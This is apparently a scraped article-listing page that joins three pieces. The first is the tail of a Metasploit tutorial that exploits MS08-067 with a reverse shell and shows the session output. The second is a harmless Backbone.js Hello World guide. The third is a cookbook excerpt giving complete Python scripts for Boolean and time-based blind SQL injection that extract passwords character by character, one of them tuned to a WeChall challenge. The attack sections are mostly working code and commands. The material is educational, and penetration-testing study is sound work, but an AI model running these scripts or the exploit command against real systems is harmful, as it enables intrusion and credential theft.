RHOST=192.168.0.7 P [*] Please wait while we load the module tree...   Compatible payloads ===================      Name                             Description    ----                             -----------    generic/debug_trap               Generate a debug trap in the target process    generic/shell_bind_tcp           Listen for a connection and spawn a command shell ... Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows: # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on 192.168.0.3:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)   Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.   C:WINDOWSsystem32> As you can see, we have acquired a local shell access to our target machine after setting the LHOST parameter for a chosen payload.
Read more
  • 0
  • 0
  • 8444
article-image-building-app-using-backbonejs
Packt
29 Jul 2013
7 min read
Save for later

Building an app using Backbone.js

Packt
29 Jul 2013
7 min read
(For more resources related to this topic, see here.) Building a Hello World app For building the app you will need the necessary script files and a project directory laid out. Let's begin writing some code. This code will require all scripts to be accessible; otherwise we'll see some error messages. We'll also go over the Web Inspector and use it to interact with our applications. Learning this tool is essential for any web application developer to proficiently debug (and even write new code for) their application. Step 1 – adding code to the document Add the following code to the index.html file. I'm assuming the use of LoDash and Zepto, so you'll want to update the code accordingly: <!DOCTYPE HTML> <html> <head> <title>Backbone Application Development Starter</title> <!-- Your Utility Library --> <script src ="scripts/lodash-1.3.1.js"></script> <!-- Your Selector Engine --> <script src ="scripts/zepto-1.0.js"></script> <script src ="scripts/backbone-1.0.0.js"></script> </head> <body> <div id="display"> <div class ="listing">Houston, we have a problem.</div> </div> </body> <script src ="scripts/main.js"></script> </html> This file will load all of our scripts and has a simple <div>, which displays some content. I have placed the loading of our main.js file after the closing <body> tag. This is just a personal preference of mine; it will ensure that the script is executed after the elements of the DOM have been populated. If you were to place it adjacent to the other scripts, you would need to encapsulate the contents of the script with a function call so that it gets run after the DOM has loaded; otherwise, when the script runs and tries to find the div#display element, it will fail. Step 2 – adding code to the main script Now, add the following code to your scripts/main.js file: var object = {};_.extend(object, Backbone.Events);object.on("show-message", function(msg) {$('#display .listing').text(msg);});object.trigger("show-message", "Hello World"); Allow me to break down the contents of main.js so that you know what each line does. var object = {}; The preceding line should be pretty obvious. We're just creating a new object, aptly named object, which contains no attributes. _.extend(object, Backbone.Events); The preceding line is where the magic starts to happen. The utility library provides us with many functions, one of which is extend. This function takes two or more objects as its arguments, copies the attributes from them, and appends them to the first object. You can think of this as sort of extending a class in a classical language (such as PHP). Using the extend utility function is the preferred way of adding Backbone functionality to your classes. In this case, our object is now a Backbone Event object, which means it can be used for triggering events and running callback functions when an event is triggered. By extending your objects in this manner, you have a common method for performing event-based actions in your code, without having to write one-off implementations. object.on("show-message", function(msg) {$('#display .listing').text(msg);}); The preceding code adds an event listener to our object. The first argument to the on function is the name of the event, in this case show-message. This is a simple string that describes the event you are listening for and will be used later for triggering the events. There isn't a requirement as far as naming conventions go, but try to be descriptive and consistent. The second argument is a callback function, which takes an argument that can be set at the time the event is triggered. The callback function here is pretty simple; it just queries the DOM using our selector engine and updates the text of the element to be the text passed into the e vent. object.trigger("show-message", "Hello World"); Finally, we trigger our event. Simply use the trigger function on the object, tell it that we are triggering the show-message event, and pass in the argument for the trigger callback as the second argument. Step 3 – opening the project in your browser This will show us the text Hello World when we open our index.html file in our browser. Don't believe me? Double click on the file now, and you should see the following screen: If Chrome isn't your default browser, you should be able to right-click on the file from within your file browser and there should be a way to choose which application to open the file with. Chrome should be in that list if it was installed properly. Step 4 – encountering a problem Do you see something other than our happy Hello World message? The code is set up in a way that it should display the message Houston , we have a problem if something were to go wrong (this text is what is displayed in the DOM by default, before having JavaScript run and replace it). The missing script file The first place to look for the problem is the Network tab of the Web Inspector. This tab shows us each of the files that were downloaded by the browser to satisfy the rendering of the page. Sometimes, the Console tab will also tell us when a file wasn't properly downloaded, but not always. The following screenshot explains this: If you look at the Network tab, you can see an item clearly marked in red ( backbone-1.0.0.js ). In my project folder, I had forgotten to download the Backbone library file, thus the browser wasn't able to load the file. Note that we are loading the file from the local filesystem, so the status column says either Success or Failure . If these files were being loaded from a real web server, you would see the actual HTTP status codes, such as 200 OK for a successful file download or 404 Not Found for a missing file. The script typo Perhaps you have made a typo in the script while copying it from the book. If you have any sort of issues resulting from incorrect JavaScript, they will be visible in the Console tab, as shown in the following screenshot: In my example, I had forgotten the line about extending my object with the Backbone events class. Having left out the extend line of code caused the object to be missing some functionality, specifically the method on(). Notice how the console displays which filename and line number the error is on. Feel free to remove and add code to the files and refresh the page to get a feel for what the errors look like in the console. This is a great way to get a feel for debugging Backbone-based (and, really, any JavaScript) applications. Summary In this article we learned how to develop an app using Backbone.js. Resources for Article : Further resources on this subject: JBoss Portals and AJAX - Part 1 [Article] Getting Started with Zombie.js [Article] DWR Java AJAX User Interface: Basic Elements (Part 1) [Article]
Read more
  • 0
  • 0
  • 8383

article-image-sql-injection
Packt
23 Jun 2015
11 min read
Save for later

SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions to normalize attack times. (For more resources related to this topic, see here.) Exploiting Boolean SQLi There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, dependant on how patient you are. We will create a script that takes a yes value, and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change dependant on the system you are testing. How to do it… The following script is how yours should look: import requests import sys   yes = sys.argv[1]   i = 1 asciivalue = 1   answer = [] print "Kicking off the attempt"   payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}   while True: req = requests.post('<target url>' data=payload) lengthtest = req.text if yes in lengthtest:    length = i    break else:    i = i+1   for x in range(1, length): while asciivalue < 126: payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload)    if yes in req.text:    answer.append(chr(asciivalue)) break else:      asciivalue = asciivalue + 1      pass asciivalue = 0 print "Recovered String: "+ ''.join(answer) How it works… Firstly the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1 as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and instruct the user the script is starting. yes = sys.argv[1]   i = 1 asciivalue = 1 answer = [] print "Kicking off the attempt" Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated: payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'} We then repeat the next loop forever as we have no idea how long the password is. We submit the payload to the target URL in a POST request: while True: req = requests.post('<target url>' data=payload) Each time we check to see if the yes value we set originally is present in the response text and if so, we end the while loop setting the current value of i as the parameter length. The break command is the part that ends the while loop: lengthtest = req.text if yes in lengthtest:    length = i    break If we don't detect the yes value, we add one to i and continue the loop: else:    i = i+1re Using the identified length of the target string, we iterate through each character and, using the ascii value, each possible value of that character. For each value we submit it to the target URL. Because the ascii table only runs up to 127, we cap the loop to run until the ascii value has reached 126. If it reaches 127, something has gone wrong: for x in range(1, length): while asciivalue < 126:  payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload) We check to see if our yes string is present in the response and if so, break to go onto the next character. We append our successful to our answer string in character form, converting it with the chr command: if yes in req.text:    answer.append(chr(asciivalue)) break If the yes value is not present, we add to the ascii value to move onto the next potential character for that position and pass: else:      asciivalue = asciivalue + 1      pass Finally we reset ascii value for each loop and then when the loop hits the length of the string, we finish, printing the whole recovered string: asciivalue = 1 print "Recovered String: "+ ''.join(answer) There's more… This script could be potentially altered to handle iterating through tables and recovering multiple values through better crafted SQL Injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts. Exploiting Blind SQL Injection Sometimes life hands you lemons, Blind SQL Injection points are some of those lemons. When you're reasonably sure you've found an SQL Injection vulnerability but there are no errors and you can't get it to return you data. In these situations you can use timing commands within SQL to cause the page to pause in returning a response and then use that timing to make judgements about the database and its data. We will create a script that makes requests to the server and returns differently timed responses dependant on the characters it's requesting. It will then read those times and reassemble strings. How to do it… The script is as follows: import requests   times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'}   payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} req = requests.post('<target url>' data=payload, cookies=cookies) firstresponsetime = str(req.elapsed.total_seconds)   for x in range(1, firstresponsetime): payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} req = requests.post('<target url>', data=payload, cookies=cookies) responsetime = req.elapsed.total_seconds a = chr(responsetime)    times.append(a)    answer = ''.join(times) print "Recovered String: "+ answer How it works… As ever we import the required libraries and declare the lists we need to fill later on. We also have a function here that states that the script has indeed started. With some time-based functions, the user can be left waiting a while. In this script I have also included cookies using the request library. It is likely for this sort of attack that authentication is required: times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'} We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the SQL command initially and allows us to input our own SQL commands. Next we say in the event of the first command failing perform the following command with OR. We then tell the server to sleep one second for every character in the first row in the password column. Finally we close the statement with a semi-colon and comment out any trailing characters with a hash (or pound if you're American and/or wrong): payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} We then set length of time the server took to respond as the firstreponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain: firstresponsetime = str(req.elapsed).total_seconds We create a loop which will set x to be all numbers from 1 to the length of the string identified and perform an action for each one. We start from 1 here because MySQL starts counting from 1 rather than from zero like Python: for x in range(1, firstresponsetime): We make a similar payload as before but this time we are saying sleep for the ascii value of X character of the password in the password column, row one. So if the first character was a lower case a then the corresponding ascii value is 97 and therefore the system would sleep for 97 seconds, if it was a lower case b it would sleep for 98 seconds and so on: payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} We submit our data each time for each character place in the string: req = requests.post('<target url>', data=payload, cookies=cookies) We take the response time from each request to record how long the server sleeps and then convert that time back from an ascii value into a letter: responsetime = req.elapsed.total_seconds a = chr(responsetime) For each iteration we print out the password as it is currently known and then eventually print out the full password: answer = ''.join(times) print "Recovered String: "+ answer There's more… This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited, blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment. As you can see, I've had to account for smaller time differences in differing values, server lag and also incorporated a checking method to reset the testing value each time and submit it automatically: import subprocess import requests   def round_down(num, divisor):    return num - (num%divisor)   subprocess.Popen(["modprobe pcspkr"], shell=True) subprocess.Popen(["beep"], shell=True)     values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'} times = [] answer = "This is the first time" cookies = {'wc': 'cookie'} setup = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies) y=0 accum=0   while 1: reset = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?reset=me', cookies=cookies) for line in reset.text.splitlines():    if "last hash" in line:      print "the old hash was:"+line.split("      ")[20].strip(".</li>")      print "the guessed hash:"+answer      print "Attempts reset n n"    for x in range(1, 33):      payload = {'injection': ''or IF (ord(substr(password,      '+str(x)+', 1)) BETWEEN 48 AND      57,sleep((ord(substr(password, '+str(x)+', 1))-      48)/4),sleep((ord(substr(password, '+str(x)+', 1))-      55)/4));#', 'inject': 'Inject'}      req = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php?ajax=1', data=payload, cookies=cookies)      responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed) [8]+str(req.elapsed)[9]      accum = accum + int(responsetime)      benchmark = int(15)      benchmarked = int(responsetime) - benchmark      rounded = str(round_down(benchmarked, 25))      if rounded in values:        a = str(values[rounded])        times.append(a)        answer = ''.join(times)      else:        print rounded        rounded = str("375")        a = str(values[rounded])        times.append(a)        answer = ''.join(times) submission = {'thehash': str(answer), 'mybutton': 'Enter'} submit = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php', data=submission, cookies=cookies) print "Attempt: "+str(y) print "Time taken: "+str(accum) y += 1 for line in submit.text.splitlines():    if "slow" in line:      print line.strip("<li>")    elif "wrong" in line:       print line.strip("<li>") if "wrong" not in submit.text:    print "possible success!"    #subprocess.Popen(["beep"], shell=True) Summary We looked at how to attack strings through different penetration attacks via Boolean SQLi and Blind SQL Injection. You will find some various kinds of attacks present in the book throughout. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Wireless and Mobile Hacks [article] Introduction to the Nmap Scripting Engine [article]
Read more
  • 0
  • 0
  • 8207
Modal Close icon
Modal Close icon